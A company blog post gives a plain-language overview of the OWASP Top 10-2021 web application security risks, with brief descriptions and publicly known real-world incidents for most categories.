OWASP Top 10-2021

OWASP Top 10-2021

OWASP Top 10  in gradient blue letters with the OWASP logo on the top left.

OWASP, Cybersecurity, Web Application Vulnerability

August 13, 2024

What is OWASP?

The Open Web Application Security Project (OWASP) is an international non-profit organization dedicated to the security of web applications. OWASP has no commercial intentions and is open to anyone interested in the topic of data and operational security in web applications. They provide resources such as documentation, tools, videos, and forums. Their famous project is the OWASP Top 10.

What are the OWASP Top 10?

The OWASP Top 10 is a regularly updated report that describes security risks for web applications, focusing on the 10 most critical vulnerabilities. The list has been created by the namesake OWASP non-profit organization since 2003 and is updated every two to three years. In 2021, the OWASP Top 10 list was updated to its latest version.

The OWASP TOP 10 - 2021

In the current OWASP Top 10 of 2021, three new categories have been added compared to the previous edition of 2017: Insecure Design, Software and Data Integrity Failures, and Server-Side Request Forgery. Additionally, some categories have been renamed or redefined.

A01:2021 - Broken Access Control

Access Control focuses on implementing restrictions for authenticated users so that they cannot perform actions beyond their permission level. Flaws in access control can lead to uncontrolled data leakage of sensitive information or allow manipulation of accessible data.

Real-Life Example

An inadequate access control allowed a security expert to access the CD keys for every game on Steam.

A02:2021 - Cryptographic Failures

Cryptographic failures refer to mistakes in the encryption of data and data transfers, as well as the failure to use adequate encryption methods. Lapses in cryptography clearly impact the security of applications and their data. Attackers can steal and alter data due to insufficient security, which can lead to serious consequences. This was previously known as "Sensitive Data Exposure," but this name is not entirely accurate, as it describes symptoms and impacts rather than causes. The new name focuses on encryption errors, as previously indicated. The disclosure of sensitive data such as private keys or passwords often occurs when vulnerabilities arise.

Real-Life Example

As part of Google’s Project Zero, a vulnerability was discovered in Cloudflare's edge servers that allowed potentially sensitive data stored in cache by search engines to be read. This vulnerability has been named Cloudbleed.

A03:2021 - Injection

Injection is a hacking technique used when user input is interpreted by an application. This can lead to the text being processed as a command or parameter. The processing "naturally" depends on the technology used.

For example, a malicious user can exploit parameters in a SQL query, allowing them to read, modify, or delete sensitive or even confidential data. This manipulation is called SQL Injection.

Another type of injection is Command Injection. This allows the attacker to start or stop system commands on the server, enabling them to gain control over the system.

An injection attack occurs when untrusted data is sent to a web application to a code interpreter via form input or another data transmission. Data or the entire application can be compromised by malicious code placed by an attacker.

A04:2021 - Insecure Design

Basically, insecure design means that no security controls are integrated into the application throughout the entire development cycle. This can have far-reaching and profound effects on security, as the application itself is not designed with security in mind.

These oversights lead to the fundamental design and foundation of the application being insecure, opening the door to a variety of security vulnerabilities - which can ultimately lead to information disclosure or total compromise of the application.

Insecure design covers vulnerabilities that arise from known/unknown errors in application/software architecture. This category focuses on risks that stem from flaws in architectural and design drafts. As explained by OWASP, these differ from risks associated with implementation flaws. Even well-implemented insecure designs are vulnerable to attacks. Insecure software designs lack security controls and business risk profiling. This makes them very susceptible to attacks.

A05:2021 - Security Misconfiguration

Security misconfigurations focus on security controls that are not secured or are improperly configured. This vulnerability is usually due to one of the following reasons: 

  • Poorly configured systems such as firewalls, web servers, or web applications.

  • Allowing and installing unnecessary features, such as ports, services, pages, accounts, or permissions.

  • Default accounts/passwords are enabled or unchanged.

  • Software is not up-to-date.

Real-Life Example

Poorly configured HTTP headers on the website of the US Department of Defense. The X-XSS-Protection header was included but configured with the value DENY, which is used for the X-Frame-Options. The expert thus recommended changing this value to 1; mode=block. The original report can be seen here.

A06:2021 - Vulnerable and Outdated Components

Modern web developers use frameworks and libraries in their web applications. These are software components that assist developers in avoiding redundant work and providing the necessary functionality. Common examples include frontend frameworks such as React and smaller libraries that add icons or A/B testing. To orchestrate larger attacks, some attackers look for vulnerabilities in these components. Some of the most popular components are used on hundreds of thousands of websites. An attacker who finds a vulnerability in one of these components could make hundreds of thousands of websites vulnerable.

Real-Life Example

On December 9, 2021, a vulnerability for Remote Code Execution (RCE) in the Apache Logging package Log4j2, version 2.14.1, was reported.

The Log4j2 library is an open-source logging library provided by the Apache Software Foundation that is widely used in online applications and services for logging development, operational, and security purposes.

A07:2021 - Identification and Authentication Failures

These security gaps in authentication and session management were previously referred to as broken authentication. Here, vulnerabilities associated with logins and authentications are listed. They include: insufficient protection against brute force, credential stuffing, credential cracking, storing passwords in plaintext, and missing or insufficient multi-factor authentication. This category remains a staple of the top 10, but as standardized development frameworks have become more popular, this category is becoming less common.

Real-Life Example

Uber failed to limit the https://biz.uber.com/confirm endpoint, which would allow an attacker to brute-force business accounts and take rides in their name. This vulnerability was reported on HackerOne. The original report can be seen here.

A08:2021 - Software and Data Integrity Failures

The new categories relate to vulnerabilities in software updates with unverified integrity of critical data and CI/CD pipelines. Such errors can occur, for example, in applications that use plugins, libraries, or modules from unverified and untrusted sources, repositories, or content delivery networks (CDNs). An insecure CI/CD pipeline can serve as an entry point for cybercriminals to inject malicious code and compromise systems. A similar source of error could be the automatic update feature of most applications, which does not necessarily involve thorough integrity checks. This opens the door for attackers to propagate updates designed to create security gaps.

Real-Life Example

The most notable example of a failing software and data integrity system is the SolarWinds Orion attack, which focused on compromised update mechanisms.

A09:2021 - Security Logging and Monitoring Failures

This category ranked tenth in 2017 and has been expanded this year to include additional types of vulnerabilities. In general, logging and monitoring are used to detect, escalate, and respond to proactive security breaches. Issues can arise, for example, when an error generates no or only inadequate log entries, when logs are kept only locally, or when the thresholds for the alert and escalation process are not properly defined.

A10:2021 - Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) occurs when a web application cannot validate a user-supplied URL when requesting a remote resource. This way, an attacker can force an application to send a crafted request to an unexpected target, even if it is protected by a firewall, VPN, or another type of network access control list (ACL). OWASP has noted that the severity of SSRF increases due to cloud services and complex architectures.

The Open Web Application Security Project (OWASP) is an international non-profit organization dedicated to the security of web applications. OWASP does not pursue commercial intentions and is open to anyone interested in the topics of data and operational security of web applications. They provide resources such as documentation, tools, videos, and forums. Their famous project is the OWASP Top 10.

© 2024 Schönbrunn TASC GmbH
Schönbrunn TASC GmbH
Riedwiesenstraße 1, 71229 Leonberg
© 2024 Schönbrunn TASC GmbH
Schönbrunn TASC GmbH
Riedwiesenstraße 1, 71229 Leonberg
© 2024 Schönbrunn TASC GmbH
Schönbrunn TASC GmbH
Riedwiesenstraße 1, 71229 Leonberg
call to action